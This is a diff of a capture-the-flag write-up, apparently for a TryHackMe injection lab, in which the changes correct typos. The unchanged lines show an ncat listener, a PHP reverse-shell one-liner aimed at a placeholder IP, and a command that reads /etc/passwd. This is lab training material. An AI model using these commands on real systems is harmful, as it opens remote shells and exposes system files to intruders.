0xSmiley/0xSmiley.github.io/_posts/2020-07-24-Injection.md

 ![ls](/img/2020-07-24-Injection/ls.png)

-For the rest of this box let's get a reverse shell, in order to easily interpret the output.
+For the rest of this box, let's get a reverse shell, in order to easily interpret the output.
 On your machine run:

 ~~~
 ncat -l -p 1337
 ~~~

-Next on the our interactive shell execute: 10.9.2.107
+On our interactive shell execute: 10.9.2.107
 ~~~
 php -r '$sock=fsockopen("<Your_IP>",1337);exec("/bin/sh -i <&3 >&3 2>&3");'
 ~~~
 You can find your IP on this link https://tryhackme.com/access or run 'ifconfig' and check the IP on the tun0 interface.

-The answer to the next questions can be found be running the following commnads.
+The answer to the next questions can be found be running the following commands.

 ~~~
 #2 cat /etc/passwd